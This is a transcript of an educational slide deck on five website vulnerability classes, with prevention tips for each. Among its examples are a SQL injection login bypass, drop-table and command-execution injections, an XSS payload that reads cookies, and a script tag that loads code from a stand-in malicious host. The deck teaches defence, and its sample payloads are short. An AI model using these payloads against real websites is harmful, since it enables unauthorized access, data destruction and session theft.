1 / 21

SECURITY VULNERABILITIES IN WEBSITES

SECURITY VULNERABILITIES IN WEBSITES. by Brian Vees. Five Types of Vulnerabilities. SQL Injection Username Enumeration Cross Site Scripting (XSS) Remote Code Execution String Formatting Vulnerabilities. SQL Injection. A very common, and easy to exploit vulnerability

paiva
Télécharger la présentation

SECURITY VULNERABILITIES IN WEBSITES

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. SECURITY VULNERABILITIES IN WEBSITES by Brian Vees

  2. Five Types of Vulnerabilities • SQL Injection • Username Enumeration • Cross Site Scripting (XSS) • Remote Code Execution • String Formatting Vulnerabilities

  3. SQL Injection • A very common, and easy to exploit vulnerability • Requires basic SQL knowledge • The basic idea: • Find a user-inputted field that most likely is used to query a database • Insert text in the field which will then merge with the SQL query being executed • Examine the results to gain info about the database • Using this info, write better queries to receive potentially private data

  4. SQL Injection - Example • Given a sample loginprompt on a webpage: • Query to validate username might look like this: • Entering a single apostrophe “breaks out” of the intended SQL code, allowing other code to be executed query = "select * from user where username='" + tbUserName.Text + "'";

  5. SQL Injection – Example (Cont.) • Entering this datacauses the followingquery to be sent to thedatabase: • Since 1=1 is always true, this query returns all users in the database select * from user where username='' or 1=1 --'

  6. Other Examples • SQL injection to obtain error messages containing useful data • SQL injection to delete data ('drop [tablename]--) • SQL injection to execute filesexec sp_oamethod @o, 'run', NULL, 'executable.exe'

  7. SQL Injection Prevention • “Escape” apostrophes • String replacement on SQL-specific character combinations (“--”) • Safest: reject any bad input rather than attempting to “cleanse” it • Not necessarily plausible: names like O’Brien and other valid input contain apostrophes

  8. Username Enumeration • A very simple method of finding valid usernames Invalid Username Valid Username

  9. Username Enumeration Prevention • Use the same error message for invalid password and invalid username • This way an attacker has no idea whether or not the username is correct

  10. Cross Site Scripting • Another type of code injection, but with client-side script • Can be used to bypass client-side security, as well as gain other information (session cookies) • Yahoo! and even Google have previously fallen victim to this vulnerability

  11. XSS Example • This form echoes what the user entered in the case of an invalid login (i.e. invalid characters) • What if we input JavaScript?

  12. Why Is XSS Dangerous? • Consider if we now input the following code:<script>alert(document.cookie)</script> • With this data, we can bypass cookie-based security • Also, external, lengthier scripts can be injected:<script src=“http://www.malicioussite.com/javascript.src”></script>

  13. XSS Prevention • User input cleansing • Don’t echo user input back unless it is necessary

  14. Remote Code Execution • Potentially the most dangerous vulnerability • Stems from unsecure settings on a web server

  15. Remote Code Execution Example • In PHP, the register_globals setting is often set to “on” to ease development • This allows for global variables to be set remotely • require($page . “.php”); • If $page is not initialized, any arbitrary file can be included and will be executed on that server

  16. XML Vulnerabilities • There are several XML specifications that are also vulnerable to remote code execution • Improperly validated XML can “break out” of the XML, and execute malicious code

  17. Remote Code Execution Prevention • Ensure web server configuration is secure (namely, if using PHP, turn register_globals off) • Validate user input

  18. String Formatting Vulnerabilities • An attack on server-side functions that can perform formatting (such as C’s printf) • Special characters are used to read or write sections of memory that normally would not be accessible

  19. String Formatting Example • %s can be used to continue reading data off the stack until an illegal memory address is attempted to be accessed, crashing the program • %x can be used to print areas of memory that are normally not accessible • %d, %u, and %x can be used to overwrite the instruction pointer, allowing the execution of user-defined code

  20. String Formatting Vulnerability Prevention • Make sure and verify all user input • Replace or reject special characters (“%”)

  21. Conclusion • What is the golden rule that will stop the majority of these website attacks? Validate User Input!

More Related